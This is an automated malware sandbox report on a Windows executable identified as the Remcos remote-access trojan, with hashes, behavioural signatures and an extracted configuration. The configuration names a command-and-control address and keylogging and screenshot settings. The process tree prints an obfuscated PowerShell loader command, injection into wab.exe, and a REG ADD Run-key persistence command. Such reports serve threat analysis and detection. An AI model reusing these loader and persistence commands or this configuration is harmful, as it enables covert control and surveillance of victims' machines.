Analysis
-
max time kernel
35s -
max time network
36s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30-08-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
General
-
Target
d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe
-
Size
636KB
-
MD5
c1c571c4f8f69d3c8aa0ec091173bd5e
-
SHA1
a36ac174f8ee2ed2254f69a21799837af58071f2
-
SHA256
d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb
-
SHA512
08b540ab5ebb986cc43add736aee38d11a5f0da5252384bb30c7ca7f7b464e63debab4cec5a3dd122e3280f26e57e5ac8adc171e237a681d0e95239bddc11a1d
-
SSDEEP
12288:5rRo7TKXllTfhmiKdHEHPSXbOp/NoJnYRlXO3iBM4ILaa+Brt:JC7TKXlFfsiMEHPSq8YfMiBMh+ht
Malware Config
Extracted
remcos
RemoteHost
45.95.169.18:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-HP1D61
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 2876 d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\\Reattach237\\').Kkkenredskab;%Risikofriestes% ($Follikler)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3004 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 852 powershell.exe 3004 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 852 set thread context of 3004 852 powershell.exe 32 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Detrainment90\strenuosity.pot d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe -
pid Process 852 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2480 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 852 powershell.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 852 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2876 wrote to memory of 852 2876 d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe 29 PID 2876 wrote to memory of 852 2876 d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe 29 PID 2876 wrote to memory of 852 2876 d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe 29 PID 2876 wrote to memory of 852 2876 d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe 29 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 852 wrote to memory of 3004 852 powershell.exe 32 PID 3004 wrote to memory of 2052 3004 wab.exe 33 PID 3004 wrote to memory of 2052 3004 wab.exe 33 PID 3004 wrote to memory of 2052 3004 wab.exe 33 PID 3004 wrote to memory of 2052 3004 wab.exe 33 PID 2052 wrote to memory of 2480 2052 cmd.exe 35 PID 2052 wrote to memory of 2480 2052 cmd.exe 35 PID 2052 wrote to memory of 2480 2052 cmd.exe 35 PID 2052 wrote to memory of 2480 2052 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe"C:\Users\Admin\AppData\Local\Temp\d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\Admin\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2480
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
364KB
MD54f7bc22100b0ce9f5392bb0b43ab22c9
SHA1322f410d7c94a5f400656e1c49b5d4cef6dde8f2
SHA25667e85d9212594f2e8be65a3a6a3c8625ca5efe8070050c390e918bcd1da16f3a
SHA512dfc1ba12d84c489d6f6417c1c2f775ba107076b48f2f57b0a565070a88f91334187734463f895b17de46acb620347a1fc36c1deef55969942cf4663de48a347b
-
Filesize
54KB
MD54bb55c98fcfab7c0706cf43af638c89e
SHA158f5ec920e25fa95c47a826e34736d1159232efd
SHA256fafe02f6852b01802bbfe61fe7bb3de41e3d32dfd7b7054e8da7774cecbb3d8d
SHA512591fb17f2d78e25ef91eeb48d8fee5d09de00e553fa0710c28c84f3f1bc657cc8b4d2a4f6e982e4409d8e3450f60d13e6dbce473d33b3fab3d0eed3b489e5e27
-
Filesize
9KB
MD5eb2c74e05b30b29887b3219f4ea3fdab
SHA191173d46b34e7bae57acabdbd239111b5bcc4d9e
SHA256d253ca5aba34b925796777893f114cc741b015af7868022ab1db2341288c55ed
SHA5121bb035260223ec585170f891c2624b9ae98671f225e74b913b40bb77b66e3b9c2016037bc8e4b0ae16367d82590a60a0a3bd95d05139ea2454f02020d1b54dae